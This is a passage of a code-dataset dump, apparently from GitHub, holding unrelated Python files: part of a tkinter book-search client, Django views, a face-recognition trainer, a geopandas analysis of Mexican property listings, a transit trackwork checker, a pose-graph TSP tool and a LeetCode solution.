column=0, sticky='w')\n self.eQuery.grid(row=0, column=1, sticky='nsew', padx=3, pady=3)\n self.eQuery.bind('<Return>', self.on_button_search)\n self.bSearch.grid(row=0, column=2, sticky='nsew', padx=3)\n self.lType.grid(row=1, column=0, sticky='w')\n\n self.frame1.grid_rowconfigure(0, weight=1)\n self.frame1.grid_rowconfigure(1, weight=1)\n self.frame1.grid_columnconfigure(0, weight=3)\n self.frame1.grid_columnconfigure(1, weight=100)\n self.frame1.grid_columnconfigure(2, weight=7)\n\n # Frame 2\n self.rAuthor.pack(side=tk.LEFT)\n self.rBook.pack(side=tk.LEFT)\n self.frame2.grid(row=1, column=1, sticky='w')\n\n # Frame 3\n self.lResults.grid(row=0, column=0, sticky='w')\n self.tResults.grid(row=1, column=0, sticky='nsew', columnspan=2)\n\n self.tResults.heading('1', text='*')\n self.tResults.column('1', width=15, minwidth=30, stretch=tk.NO)\n self.tResults.heading(Manager.get_name('author'), text=Manager.get_name('author'))\n self.tResults.column(Manager.get_name('author'), width=200)\n self.tResults.heading(Manager.get_name('book'), text=Manager.get_name('book'))\n self.tResults.column(Manager.get_name('book'), width=551)\n self.tResults.bind('<Double-1>', self.on_search_result_dclick)\n self.tResults.bind('<Button-3>', self.on_search_result_rclick)\n\n self.frame3.grid_rowconfigure(0, weight=1)\n self.frame3.grid_rowconfigure(1, weight=50, pad=7)\n self.frame3.grid_columnconfigure(0, weight=6)\n self.frame3.grid_columnconfigure(1, weight=1)\n\n self.scrollResults.pack(side=tk.RIGHT, fill='y')\n self.tResults.configure(yscrollcommand=self.scrollResults.set)\n\n # Frame 4\n self.lStatus.pack(side=tk.LEFT)\n self.bDownloadSelected.pack(side=tk.RIGHT)\n\n # Result\n self.frame1.pack(side=tk.TOP, fill='x', padx=(7, 7), pady=(7, 0))\n self.frame3.pack(side=tk.TOP, fill='both', expand=True, padx=(7, 7), pady=(0, 7))\n self.frame4.pack(side=tk.TOP, fill='both', expand=False, padx=(10, 7), pady=(0, 7))\n\n def on_button_search(self, event=None):\n if self.eQuery.get() and self.queryType.get() != 0:\n self.current_query = self.eQuery.get()\n self.current_query_type = self.queryType.get()\n temp1 = SearchAlert(self)\n self.update()\n self.search_results = Manager.do_search(self.current_query, self.current_query_type)\n self.__update_results()\n temp1.destroy()\n self.lStatus.config(text=Manager.get_name('searchCompleted') + str(len(self.search_results)))\n if self.current_query_type == QueryType.AUTHOR.value:\n self.bDownloadSelected['state'] = tk.DISABLED\n else:\n self.bDownloadSelected['state'] = tk.NORMAL\n else:\n messagebox.showwarning(Manager.get_title(), Manager.get_name('emptyQuery'))\n\n def on_book_download(self, event=None):\n self.__create_download_alert()\n\n Manager.do_book_download(self.search_IDs[self.selected_row_id],\n Manager.get_config('bookFormat'),\n Manager.get_config('saveDir') if Manager.get_config('isSaveToDir')\n else filedialog.askdirectory(),\n self.__download_callback)\n self.download_alert.destroy()\n\n def on_book_download_in(self, event=None):\n self.__create_download_alert()\n Manager.do_book_download(self.search_IDs[self.selected_row_id],\n Manager.get_config('bookFormat'),\n filedialog.askdirectory(),\n self.__download_callback)\n self.download_alert.destroy()\n\n # Download selected books\n def on_download_selected(self, event=None, down_in=False):\n download_list = []\n if len(self.search_IDs) == 0:\n return\n for (item_id, link) in self.search_IDs.items():\n if self.tResults.item(item_id)['values'][0] == '*':\n download_list.append(link)\n if 
len(download_list) != 0:\n self.__create_download_alert()\n Manager.do_books_download(download_list,\n Manager.get_config('bookFormat'),\n Manager.get_config('saveDir') if Manager.get_config('isSaveToDir') and not down_in\n else filedialog.askdirectory(),\n self.__download_callback)\n self.download_alert.destroy()\n\n # Downloads all authors books\n def on_author_download(self, event=None):\n self.__author_transition()\n self.on_download_selected(down_in=False)\n\n def on_author_download_in(self, event=None):\n self.__author_transition()\n self.on_download_selected(down_in=True)\n\n # Marks book as to be downloaded\n def on_search_result_dclick(self, event):\n row_to_check = self.tResults.identify_row(event.y)\n if row_to_check:\n temp1 = self.tResults.item(row_to_check)['values']\n if not (temp1[1].startswith('-') or self.queryType.get() == QueryType.AUTHOR.value):\n if temp1[0] == '*':\n temp1[0] = ' '\n else:\n temp1[0] = '*'\n self.tResults.item(row_to_check, values=temp1)\n self.tResults.update()\n\n def on_search_result_rclick(self, event):\n self.selected_row_id = self.tResults.identify_row(event.y)\n if self.selected_row_id:\n if self.current_query_type == QueryType.BOOK.value:\n context_menu = self.create_book_context_menu()\n elif self.current_query_type == QueryType.AUTHOR.value:\n context_menu = self.create_author_context_menu()\n else:\n print('UNIMPLEMENTED')\n exit(1)\n context_menu.tk_popup(event.x_root, event.y_root)\n context_menu.grab_release()\n\n def create_book_context_menu(self):\n result = tk.Menu(self, tearoff=0)\n result.add_command(label=Manager.get_name('downloadBook'), command=self.on_book_download)\n result.add_separator()\n # result.add_command(label=Manager.get_name('viewAuthor'), command=self.on_view_author) TODO: Implement\n result.add_command(label=Manager.get_name('sDownloadBook'), command=self.on_book_download_in)\n result.add_command(label=Manager.get_name('openInBrowser'), command=self.on_open_browser)\n return result\n\n def create_author_context_menu(self):\n result = tk.Menu(self, tearoff=0)\n result.add_command(label=Manager.get_name('viewAuthor'), command=self.on_view_author)\n result.add_separator()\n result.add_command(label=Manager.get_name('downloadAllBooks'), command=self.on_author_download)\n result.add_command(label=Manager.get_name('sDownloadAllBooks'), command=self.on_author_download_in)\n result.add_command(label=Manager.get_name('openInBrowser'), command=self.on_open_browser)\n return result\n\n # Shows all authors books\n def on_view_author(self, event=None):\n self.eQuery.delete(0, tk.END)\n for e in self.search_results:\n if e[2] == self.search_IDs[self.selected_row_id]:\n self.eQuery.insert(0, e[1] if self.queryType == QueryType.BOOK.value else e[0])\n self.current_query_type = QueryType.BOOK.value\n self.queryType.set(QueryType.BOOK.value)\n self.search_results = Manager.do_get_authors_books(self.search_IDs[self.selected_row_id])\n self.bDownloadSelected['state'] = tk.NORMAL\n self.__update_results()\n\n def on_open_browser(self, event=None):\n webbrowser.open(Manager.get_url() + self.search_IDs[self.selected_row_id], new=0, autoraise=True)\n\n def __update_results(self):\n self.__clear_tree()\n\n for element in self.search_results:\n list_id = self.tResults.insert('', tk.END, values=('', element[0], element[1]))\n self.search_IDs[list_id] = element[2]\n\n def __clear_tree(self):\n for element in self.tResults.get_children():\n self.tResults.delete(element)\n self.search_IDs.clear()\n\n def __create_download_alert(self):\n 
self.download_alert = DownloadAlert(self)\n self.download_alert.attributes('-topmost', 'true')\n self.update()\n self.download_alert.grab_set()\n\n def __download_callback(self, value):\n assert self.download_alert is not None\n self.download_alert.progress_set(value)\n self.update()\n\n # Selects all author's books\n def __author_transition(self):\n self.on_view_author()\n for e in self.search_IDs.keys():\n temp1 = self.tResults.item(e)['values']\n if not temp1[1].startswith('-') or not self.queryType.get() == QueryType.AUTHOR.value:\n temp1[0] = '*'\n self.tResults.item(e, values=temp1)\n self.tResults.update()\n\n def about_window(self):\n new_window = AboutWindow(self)\n new_window.attributes('-topmost', 'true')\n new_window.grab_set()\n\n def help_window(self):\n new_window = HelpWindow(self)\n new_window.attributes('-topmost', 'true')\n new_window.grab_set()\n\n def settings_window(self):\n new_window = SettingsWindow(self)\n new_window.attributes('-topmost', 'true')\n new_window.grab_set()\n","repo_name":"InAnYan/flibustaClient","sub_path":"windows/MainApp.py","file_name":"MainApp.py","file_ext":"py","file_size_in_byte":12342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4435870562","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .models import Category, Article\nfrom .forms import SubscribeForm, UnsubscribeForm\n\n\n@login_required\ndef subscribe(request):\n if request.method == 'POST':\n form = SubscribeForm(request.POST)\n if form.is_valid():\n categories = form.cleaned_data['categories']\n for category in categories:\n category.subscribers.add(request.user)\n return redirect('home') # Replace 'home' with the URL of your home page\n else:\n form = SubscribeForm()\n return render(request, 'subscribe.html', {'form': form})\n\n\n@login_required\ndef unsubscribe(request):\n if request.method == 'POST':\n form = UnsubscribeForm(request.POST)\n if form.is_valid():\n categories = form.cleaned_data['categories']\n for category in categories:\n category.subscribers.remove(request.user)\n return redirect('home') # Replace 'home' with the URL of your home page\n else:\n form = UnsubscribeForm()\n return render(request, 'unsubscribe.html', {'form': form})\n\n\ndef home(request):\n categories = Category.objects.all()\n articles = Article.objects.order_by('-created_at')[:5]\n return render(request, 'home.html', {'categories': categories, 'articles': articles})\n","repo_name":"dodu204/News_Portal_D9.5.4","sub_path":"news_portal/news_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
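The views.py record above relies on a Category model exposing a subscribers many-to-many relation. A hypothetical model sketch consistent with those calls; only `subscribers` is implied by the views, the other field names are assumptions:

# Hypothetical models.py sketch; `name` and related_name are illustrative.
from django.contrib.auth.models import User
from django.db import models

class Category(models.Model):
    name = models.CharField(max_length=64)
    # subscribe()/unsubscribe() above call .add()/.remove() on this relation
    subscribers = models.ManyToManyField(User, related_name='categories', blank=True)

    def __str__(self):
        return self.name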
+{"seq_id":"4023036201","text":"import cv2 as cv\nimport os\nimport numpy as np\npeople=[]\ndirs=r'E:\cv2programming\facerecog\train'\nfeatures=[]\nlabels=[]\nhcv=cv.CascadeClassifier('haarface.xml')\nfor i in os.listdir(r'E:\cv2programming\facerecog\train'):\n people.append(i)\ndef training():\n for p in people:\n path=os.path.join(dirs,p)\n label=people.index(p)\n for i in os.listdir(path):\n img_path=os.path.join(path,i)\n img_array=cv.imread(img_path)\n gray=cv.cvtColor(img_array,cv.COLOR_BGR2GRAY)\n faces=hcv.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=4)\n for (x,y,w,h) in faces:\n froi=gray[y:y+h,x:x+w]\n features.append(froi)\n labels.append(label)\ntraining()\nprint(f'featurelength={len(features)}')\nprint(f'labellength={len(labels)}')\nfeaturesarray=np.array(features,dtype='object')\nlabelsarray=np.array(labels)\nfacerecognizer=cv.face.LBPHFaceRecognizer_create()\nfacerecognizer.train(featuresarray,labelsarray)\nfacerecognizer.save('trainedface.yml')\nnp.save('features.npy',featuresarray)\nnp.save('labels.npy',labelsarray)","repo_name":"anirbanhati/cv2programming","sub_path":"facerecog/facetrain.py","file_name":"facetrain.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
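A companion sketch for the facetrain.py record above: loading the saved LBPH model and predicting on detected faces. Requires opencv-contrib-python; 'trainedface.yml' and 'haarface.xml' are the files the trainer uses, while 'test.jpg' is a placeholder input:

# Companion recognition sketch for the LBPH model trained above.
import cv2 as cv

recognizer = cv.face.LBPHFaceRecognizer_create()
recognizer.read('trainedface.yml')
hcv = cv.CascadeClassifier('haarface.xml')
gray = cv.cvtColor(cv.imread('test.jpg'), cv.COLOR_BGR2GRAY)
for (x, y, w, h) in hcv.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=4):
    label, distance = recognizer.predict(gray[y:y+h, x:x+w])
    print(label, distance)  # smaller distance means a closer match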
+{"seq_id":"37000636592","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Fields involved\n# \n# - direccion\n# - idzona\n# - ciudad\n# - provincia\n# - lat\n# - lng\n# \n# ## Objectives\n# \n# - Normalize (provincia, ciudad, direccion)\n# - Add information (geometry)\n# - Methods for plotting (count+density)\n# - Method to decide whether a given listing falls inside a geometry\n# \n# - Add external information (electoral district, etc.)\n# \n\n# In[1]:\n\n\nimport pandas as pd\nimport geopandas\nimport matplotlib.pyplot as plt\nfrom shapely.geometry import Point, Polygon\n\n\n# In[2]:\n\n\n# import the functions to load the dataframes\nget_ipython().run_line_magic('run', '\"../../utils/dataset_parsing.ipynb\"')\n# import the plotting functions\nget_ipython().run_line_magic('run', '\"../../utils/graphs.ipynb\"')\n\n\n# In[3]:\n\n\npais = geopandas.read_file(\"./MEX_adm/MEX_adm0.shp\")\nestados = geopandas.read_file(\"./MEX_adm/MEX_adm1.shp\")\nmunicipios = geopandas.read_file(\"./MEX_adm/MEX_adm2.shp\")\nciudades = geopandas.read_file(\"./México_Centros_Urbanos/México_Centros_Urbanos.shp\")\nmexico_polygon = pais.iloc[0][\"geometry\"]\n\n\n# In[4]:\n\n\ndf = levantar_datos(\"../../\"+DATASET_RELATIVE_PATH)\ndf[\"tiene_gps\"] = ~ (df[\"lat\"].isna() & df[\"lng\"].isna())\ncrear_punto = lambda x: Point(x[\"lng\"],x[\"lat\"]) if x[\"tiene_gps\"] else None\ndf[\"coord\"] = df.apply(crear_punto, axis=1)\n\n\n# In[ ]:\n\n\n\n\n\n# In[5]:\n\n\ndf[\"en_mexico\"] = df.loc[df[\"tiene_gps\"]][\"coord\"].map(esta_en_mexico)\n\n\n# In[6]:\n\n\ndf[\"en_mexico\"].value_counts()\n\n\n# In[7]:\n\n\ngeoDF = geopandas.GeoDataFrame(df.loc[df[\"tiene_gps\"] & df[\"en_mexico\"]], geometry=\"coord\")\n\n\n# In[8]:\n\n\ndef dibujar_mexico(puntos):\n grafico = pais.plot(figsize=(18,9))\n estados.plot(ax=grafico, color=\"white\")\n# municipios.plot(ax=grafico, color=\"white\")\n # ciudades.plot(ax=grafico, color=\"yellow\")\n puntos.plot(ax=grafico, color=\"green\")\n\n\n# In[9]:\n\n\ndef fix_provincias(df, provincias) -> bool:\n # rename the following provinces so they match my geographic info\n provincias_mapper = {\n \"Baja California Norte\": \"Baja California\",\n \"Edo. de México\": \"México\",\n \"San luis Potosí\": \"San Luis Potosí\"\n }\n df[\"estado\"] = df[\"provincia\"].map(lambda x: provincias_mapper.get(x, x))\n return set(df[\"estado\"].dropna().unique()) == set(provincias[\"NAME_1\"]) # verify against the shapefile names\n\n\n# In[10]:\n\n\nfix_provincias(geoDF, estados)\n\n\n# In[11]:\n\n\ndef buscar_provincia(punto: Point, provincias):\n \"\"\"\n Return which province of Mexico the point falls in.\n \"\"\"\n# if not punto: return None\n for provincia, geometry in provincias[[\"NAME_1\",\"geometry\"]].values:\n if geometry.contains(punto): return provincia\n\n# fill in the missing provinces\ngeoDF.loc[geoDF[\"estado\"].isna(), \"estado\"] = geoDF.loc[geoDF[\"estado\"].isna()][\"coord\"].map(lambda x: buscar_provincia(x, estados))\n\n\n# In[12]:\n\n\npublicaciones_por_estado = geoDF.loc[~geoDF[\"estado\"].isna()].groupby([\"estado\"]).agg({\"estado\":\"count\"})\npublicaciones_por_estado.columns = [\"publicaciones\"]\n\n\n# In[13]:\n\n\n# add population data to the estados df\ndf_poblacion = pd.read_csv(\"./poblacion_por_estado.csv\", index_col=\"NAME_1\")\nestados = estados.merge(on=\"NAME_1\", right=df_poblacion)\n\n\n# In[14]:\n\n\n# add listing counts to the estados df\nestados = estados.merge(left_on=\"NAME_1\", right_on=\"estado\", right=publicaciones_por_estado)\n\n\n# In[15]:\n\n\ndef choropleth_estados(estados, serie, nombre, titulo=\"\"):\n estados[nombre] = estados[\"NAME_1\"].map(serie)\n plot = estados.plot(column=nombre, legend=True, figsize=(24,8), cmap=\"Greens\") \n plot.set_title(titulo, fontdict={\"fontsize\": 18})\n plot.set_xlabel(\"Longitud\")\n plot.set_ylabel(\"Latitud\")\n return plot\n\n\n# In[16]:\n\n\nplot = choropleth_estados(estados, publicaciones_por_estado[\"publicaciones\"], \"publicaciones\", \"Cantidad de publicaciones por estado\")\nplot.figure.savefig(\"../graficos/map_publicaciones_por_estado.png\")\n\n\n# In[17]:\n\n\nplot = estados.plot(column=\"poblacion\", legend=True, figsize=(24,8), cmap=\"Greens\") \nplot.set_title(\"Población de México por estado\", fontdict={\"fontsize\": 18})\nplot.set_xlabel(\"Longitud\")\nplot.set_ylabel(\"Latitud\")\nplot.figure.savefig(\"../graficos/map_poblacion_por_estado.png\")\n\n\n# In[18]:\n\n\nestados[\"publicaciones_poblacion\"] = estados[\"publicaciones\"] / estados[\"poblacion\"]\nplot = estados.plot(column=\"publicaciones_poblacion\", legend=True, figsize=(24,8), cmap=\"Greens\") \nplot.set_title(\"Publicaciones por habitante en cada estado\", fontdict={\"fontsize\": 18})\nplot.set_xlabel(\"Longitud\")\nplot.set_ylabel(\"Latitud\")\nplot.figure.savefig(\"../graficos/map_publicaciones_por_habitante.png\")\n\n\n# # An analysis of the price per square meter by city\n# ### First I clean the data. I select the cities with the most listings\n
\n# In[19]:\n\n\nmas_publicadas = df.groupby(\"ciudad\").agg({\"id\":\"count\"})\nmas_publicadas.columns = [\"total\"]\nmas_publicadas=mas_publicadas.sort_values(\"total\", ascending=False).head(100)\nmas_publicadas.reset_index(inplace=True)\nprint(mas_publicadas)\n\n\n# In[20]:\n\n\nlista_de_ciudades = mas_publicadas.ciudad\nlista_de_ciudades = lista_de_ciudades.to_list()\nlista_de_ciudades\ndf=df[df[\"ciudad\"].isin(lista_de_ciudades)]\ndf\n\n\n# In[21]:\n\n\n# Compute the average price per square meter per city\npor_ciudad=df.groupby(\"ciudad\").agg({\"metrostotales\":\"sum\"})\npor_ciudad=por_ciudad.loc[por_ciudad.metrostotales != 0.0]\npor_ciudad[\"precios\"] = df.groupby(\"ciudad\").agg({\"precio\":\"sum\"})\npor_ciudad[\"valormetrocuadrado\"] = por_ciudad[\"precios\"] / por_ciudad[\"metrostotales\"]\npor_ciudad.reset_index(inplace=True)\n\n\n# ### Clean the dataset of null values in metrostotales and/or precios\n\n# In[22]:\n\n\npor_ciudad=por_ciudad.loc[(por_ciudad.metrostotales != 0.0)]\npor_ciudad=por_ciudad.loc[(por_ciudad.precios != 0.0)]\npor_ciudad = por_ciudad.sort_values(\"valormetrocuadrado\")\npor_ciudad.reset_index(drop=True, inplace=True)\npor_ciudad\n\n\n# # Find the extreme cities, the most expensive and the cheapest\n\n# ### Now I build a dataframe with the 10 most expensive and the 10 cheapest cities.\n\n# In[23]:\n\n\ntop_10_ciudades_mas_caras = por_ciudad.tail(10)\ntop_10_ciudades_mas_caras.reset_index(drop=True, inplace=True)\n\n\n# In[24]:\n\n\ntop_10_ciudades_mas_baratas = por_ciudad.head(10)\ntop_10_ciudades_mas_baratas.reset_index(inplace=True)\n\n\n# In[25]:\n\n\nvertical_stack = pd.concat([top_10_ciudades_mas_baratas, top_10_ciudades_mas_caras], axis=0, sort=False)\nvertical_stack.reset_index(drop=True, inplace=True)\nvertical_stack\nbar_plot(vertical_stack[\"valormetrocuadrado\"])\n\n\n# In[ ]:\n\n\nciudad_mas_barata = (top_10_ciudades_mas_baratas.loc[0,:].ciudad,top_10_ciudades_mas_baratas.loc[0,:].valormetrocuadrado)\nprint(\"Ciudad mas barata {}\".format(ciudad_mas_barata))\nciudad_mas_cara = (top_10_ciudades_mas_caras.loc[0,:].ciudad,top_10_ciudades_mas_caras.loc[0,:].valormetrocuadrado)\nprint(\"Ciudad mas cara {}\".format(ciudad_mas_cara))\namplitud = ciudad_mas_cara[1] - ciudad_mas_barata[1]\nprint(\"Amplitud de precio {}\".format(amplitud))\n\n\n# In[ ]:\n\n\n# keep only the rows that have GPS data\ntiene_gps = df[df['tiene_gps']]\ntiene_gps=tiene_gps.groupby('ciudad').agg({\"lat\":\"mean\",\"lng\":\"mean\"})\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"unmateo/7506-TP","sub_path":"src/tp1/lab/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
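A design note on buscar_provincia in the geo.py record above: the per-point loop over states is O(points x states). geopandas can do the same point-in-polygon lookup with an indexed spatial join; a hedged equivalent, assuming geopandas >= 0.10 and the geoDF/estados frames from that file:

# Hedged vectorized alternative to the buscar_provincia loop above.
import geopandas

joined = geopandas.sjoin(
    geoDF, estados[["NAME_1", "geometry"]], how="left", predicate="within"
)
# fill only the rows the name-based mapping left empty
geoDF["estado"] = geoDF["estado"].fillna(joined["NAME_1"])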
+{"seq_id":"37731673639","text":"import requests\nfrom pytz import timezone\nimport config\nfrom datetime import datetime, timedelta\n\n# Check if it's occurring between 4 and 5 days from now, on a weekend\ndef correctDates(date):\n now = datetime.now(timezone('Australia/Sydney'))\n next_4_days = now + timedelta(days=4)\n next_5_days = now + timedelta(days=5)\n return (next_4_days <= date < next_5_days) and date.weekday() >=4\n\n# Check if alerts refer to trackwork service\ndef correctAlerts(entry):\n return entry['alert']['cause'] == 'MAINTENANCE' and entry['alert']['effect'] == 'MODIFIED_SERVICE'\n\n# Check if trackwork is for North Shore Line (Cause we all live on it)\ndef includesRelatedLines(entry):\n for trainLine in entry['informedEntity']:\n if trainLine['routeId'][0:3] == 'NSN':\n filterText = \"T1 North Shore Line:\"\n if filterText in entry['headerText']['translation'][0]['text']:\n return True\n return False\n\ndef noTrackWork(output):\n return True if 'entity' not in output else False\n\ndef getNewTrackWork():\n api_url = \"https://api.transport.nsw.gov.au/v2/gtfs/alerts/sydneytrains?format=json\"\n response = requests.get(api_url, headers={'Authorization': f'apikey {config.api_key}'})\n output = response.json()\n if noTrackWork(output):\n return None\n for entry in output['entity']:\n startTime = int(entry['alert']['activePeriod'][0]['start'])\n dateTime = datetime.fromtimestamp(startTime, timezone('Australia/Sydney'))\n if (correctDates(dateTime) and correctAlerts(entry) and includesRelatedLines(entry['alert'])):\n # Return the trackwork message\n return entry['alert']['descriptionText']['translation'][0]['text']\n return None\n\ndef getNewMetroTrackWork():\n api_url = \"https://api.transport.nsw.gov.au/v2/gtfs/alerts/metro?format=json\"\n response = requests.get(api_url, headers={'Authorization': f'apikey {config.api_key}'})\n output = response.json()\n # Check if there's any trackwork at all\n if noTrackWork(output):\n return None\n for entry in output['entity']:\n startTime = int(entry['alert']['activePeriod'][0]['start'])\n dateTime = datetime.fromtimestamp(startTime, timezone('Australia/Sydney'))\n if (correctDates(dateTime) and correctAlerts(entry)):\n # Return the trackwork message\n return entry['alert']['descriptionText']['translation'][0]['text']\n return None\n\nif __name__ == \"__main__\":\n getNewMetroTrackWork()\n","repo_name":"Jevelry/TrackworkBot","sub_path":"trackworkChecker.py","file_name":"trackworkChecker.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
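A worked check of correctDates in the trackworkChecker.py record above: with "now" pinned to Monday 2023-05-01 10:00 Sydney time, the [now+4d, now+5d) window opens Friday 05-05 10:00, and weekday() >= 4 keeps only Fri/Sat/Sun starts. The dates below are illustrative only:

# Hedged worked example of the date-window logic above.
from datetime import datetime, timedelta
from pytz import timezone

syd = timezone('Australia/Sydney')
now = syd.localize(datetime(2023, 5, 1, 10, 0))    # a Monday
start = syd.localize(datetime(2023, 5, 5, 12, 0))  # a Friday inside the window
print(now + timedelta(days=4) <= start < now + timedelta(days=5))  # True
print(start.weekday() >= 4)  # True (Friday == 4)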
+{"seq_id":"1022472967","text":"from pose_graph_partitioning.pose_graph import *\ndef cvt_tsp(pg, start_points=None, agent_num=-1, random_weight = True):\n if len(pg.id2index) == 0:\n print(\"You must run setup_graph first\")\n return\n\n force_starts = start_points is not None\n min_size = 3\n max_size = len(pg.keyframes)*2\n if force_starts:\n agent_num = len(start_points)\n sp_set = set()\n for _id in start_points:\n sp_set.add(pg.id2index[_id])\n print(\"start index\", sp_set)\n \n keyframe_num = len(pg.keyframes)\n\n max_weight = 1000000\n min_weight = - 1000\n with open(\"mtsp.par\", \"w\") as f:\n print(f\"\"\"SPECIAL\nPROBLEM_FILE=problem.tsp\nSALESMEN = {agent_num}\nMTSP_OBJECTIVE = MINSUM\nMTSP_MIN_SIZE = {min_size}\nMTSP_MAX_SIZE = {max_size}\nRUNS = 5\nTOUR_FILE = mtsp.tour\nMTSP_SOLUTION_FILE=mtsp.sol\nTRACE_LEVEL =0\"\"\",file=f)\n\n weight_mat = \"\"\n # We will add a virtual start point at matrix index 0\n # The weight from the virtual start point to an allowed start point is min_weight\n dim = keyframe_num+1\n weight = np.ones((dim, dim), dtype=int)*max_weight\n for _i in range(dim):\n for _j in range(dim):\n i = _i - 1\n j = _j - 1\n if i == -1:\n if force_starts:\n if j in sp_set:\n weight[_i, _j] = min_weight\n else:\n weight[_i, _j] = min_weight\n \n if j == -1:\n weight[_i, _j] = min_weight\n elif i >=0 and j >=0 and pg.has_edge(pg.index2id[i], pg.index2id[j]):\n if random_weight:\n weight[_i, _j] = random.randint(-10, 10)\n else:\n weight[_i, _j] = 0\n \n\n for i in range(dim):\n for j in range(dim):\n weight_mat += f\"{weight[i, j]}\\t\"\n weight_mat += \"\\n\"\n\n with open(\"problem.tsp\", \"w\") as f:\n print(f\"\"\"NAME : mtsp\nTYPE: ATSP\nDIMENSION: {dim}\nEDGE_WEIGHT_TYPE : EXPLICIT\nEDGE_WEIGHT_FORMAT : FULL_MATRIX\nEDGE_WEIGHT_SECTION\n{weight_mat}\"\"\", file=f)\n\ndef solve_tsp():\n s = os.popen('LKH mtsp.par')\n output = s.read()\n print(\"LKH:\")\n pathes = []\n with open(\"mtsp.sol\", \"r\") as f:\n lines = f.readlines()\n for i in range(2, len(lines)):\n line = lines[i]\n path = []\n c = 0\n for item in line.split(' '):\n if item == \"1\":\n c += 1\n if c < 2:\n path.append(int(item)-2)\n else:\n break\n pathes.append(path[1:])\n print(f\"Read {len(pathes)} paths from TSP solution\")\n return pathes\n\ndef make_edge(kfa, kfb):\n pos = kfb.pos - kfa.pos\n pos = quaternion_rotate(quaternion_inverse(kfa.quat), pos)\n quat = quaternion_multiply(quaternion_inverse(kfa.quat), kfb.quat)\n quat = unit_vector(quat)\n edge = Edge(kfa.keyframe_id, kfb.keyframe_id, pos, quat, False, False)\n return edge\n\ndef fix_path_disconnected(pg, pathes, pg_optimized, align_beginning=False):\n count_disconnected = 0\n for path in pathes:\n for i in range(0, len(path)-1):\n _ida = pg.index2id[path[i]]\n _idb = pg.index2id[path[i+1]]\n if not pg.has_edge(_ida, _idb):\n count_disconnected += 1\n kfa = pg_optimized.keyframes[_ida]\n kfb = pg_optimized.keyframes[_idb]\n edge = make_edge(kfa, kfb)\n edge.information_matrix = pg.edges[0].information_matrix\n pg.edges.append(edge)\n \n path_num = len(pathes)\n if align_beginning:\n for i in range(path_num-1):\n _ida = pg.index2id[pathes[i][0]]\n _idb = pg.index2id[pathes[i+1][0]]\n if not pg.has_edge(_ida, _idb):\n count_disconnected += 1\n kfa = pg_optimized.keyframes[_ida]\n kfb = pg_optimized.keyframes[_idb]\n edge = make_edge(kfa, kfb)\n edge.information_matrix = pg.edges[0].information_matrix\n pg.edges.append(edge)\n\n pg.update_edges()\n print(f\"Fixed {count_disconnected} disconnected edges; now {len(pg.edges)} edges\")\n\ndef generate_path_tsp(pg, agent_num, random_weight = True, pg_optimized = None, fix_path=True, align_beginning=True, pathes=None):\n if pathes is None:\n cvt_tsp(pg, agent_num = agent_num, random_weight = random_weight)\n pathes = solve_tsp()\n if fix_path:\n fix_path_disconnected(pg, pathes, pg_optimized, align_beginning = align_beginning)\n index_part = {}\n for i in range(len(pathes)):\n for index in pathes[i]:\n index_part[index] = i\n cut, vol, min_keyframes, max_keyframes = pg.repart(agent_num, index_part)\n for _index in index_part:\n pg.keyframes[pg.index2id[_index]].drone_id = index_part[_index]\n print(f\"TSP new path keyframes {min_keyframes}<->{max_keyframes} cut {cut} comm_vol {vol}\")\n return pathes\n","repo_name":"HKUST-Aerial-Robotics/D2SLAM","sub_path":"d2pgo/scripts/pose_graph_partitioning/tsp_dataset_generation.py","file_name":"tsp_dataset_generation.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"53"}
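A footnote on the index arithmetic in the tsp_dataset_generation.py record above: cvt_tsp reserves matrix index 0 for a virtual depot, and LKH's solution file uses 1-based node ids, so a solution token k maps back to pose-graph index k - 2. The tokens below are made up for illustration:

# Hedged worked example of the depot/index shift decoded by solve_tsp above.
tokens = ["1", "3", "5", "2"]                     # one tour line as LKH might write it
path = [int(t) - 2 for t in tokens if t != "1"]   # drop the depot, shift to 0-based
print(path)                                       # [1, 3, 0] -> keyframe indices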
+{"seq_id":"11315752695","text":"def diStringMatch(S: str):\n \"\"\"\n Given a string S that only contains \"I\" (increase) or \"D\" (decrease), let N = S.length.\n\n Return any permutation A of [0, 1, ..., N] such that for all i = 0, ..., N-1:\n\n If S[i] == \"I\", then A[i] < A[i+1]\n If S[i] == \"D\", then A[i] > A[i+1]\n >>> diStringMatch(\"IDID\")\n [0, 4, 1, 3, 2]\n >>> diStringMatch(\"III\")\n [0, 1, 2, 3]\n >>> diStringMatch(\"DDI\")\n [3, 2, 0, 1]\n\n \"\"\"\n start = 0\n end = len(S)\n res = []\n for char in S:\n if char == 'I':\n res.append(start)\n start += 1\n else:\n res.append(end)\n end -= 1\n res.append(end)\n return res\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(verbose=True)","repo_name":"AlexVines/my_leetcode_solutions","sub_path":"di_match.py","file_name":"di_match.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
